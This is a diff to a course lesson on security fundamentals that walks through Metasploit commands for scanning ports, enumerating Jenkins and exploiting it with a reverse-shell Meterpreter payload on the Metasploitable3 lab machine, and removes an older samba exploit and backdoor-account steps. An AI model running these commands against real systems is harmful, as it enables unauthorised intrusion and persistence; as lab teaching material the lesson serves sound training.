tekperfect/devops-docs/docs/courses/08-Security/lessons/security-fundamentals.md

 `grep exploit search service_type`

+### Investigating Open Ports

+`use auxiliary/scanner/http/http_version`

+`set RPORT 9200`

+`run`

+What was the result?

+What things use port 9200?
+Elastic search

+`set RPORT 8484`

+`run`

+What was the result?

+What things use port 8484?
+Jenkins

+`set RPORT 8585`

+`run`

+What was the result?

+What things use port 8585?
+WAMP is Windows, Apache, MySQL, and PHP

+### Probe system for Jenkin information

+`use auxiliary/scanner/http/jenkins_enum`

+`set RPORT 8484`

+`set TARGETURI /`

+`run`

-### Exploit
+### Exploit Jenkins on Metasploitable3

-This is the samba exploit you can launch against the metasploitable linux server

-`use exploit/multi/samba/usermap_script`

 This is the command you use to set the host you are going to run the exploit against once you locate it on your network

 `set rhosts xxx.xx.xxx.xxx`

+`use exploit/multi/http/jenkins_script_console`

+`set RPORT 8484`

+`set TARGETURI /`

+`set RHOST xxx.xxx.xxxx.xxx` (This is the IP of your target)

+`set PAYLOAD windows/meterpreter/reverse_tcp'

 Starts the exploit against the system you specified with the set rhost command.

-`run`

-Is the access you have when you have successful executed the exploit against the vulnerable system.

-`reverse shell`
+`exploit`

+If your exploit is successful you should get a meterpreter prompt where you can run remote commands on the Windows host.

 ### Create, Elevate & Gain access

-Create an account on the system via reverse shell

-`useradd username`

-Change the password on the account you just created

-`passwd username`

-Process of granting privileges to a known or created account to gain root level access to system

-### Elevate Privileges

-Add the account to the sudo group

-`usermod -a -G sudo username`

-Add the account to the admin group

-`usermod -a -G admin username`

-Connect & Elevate Access

-Connect to a remote or local system via ssh with a named account that you know the password to
+Connect to a remote or local system via rdp with a named account that you know the password to

-`ssh username@xxx.xxx.xxx.xxx`

-Run a command with root or elevated privileges example: “sudo passwd username” changes the password of an account

-`sudo command-name`

 ### Now What?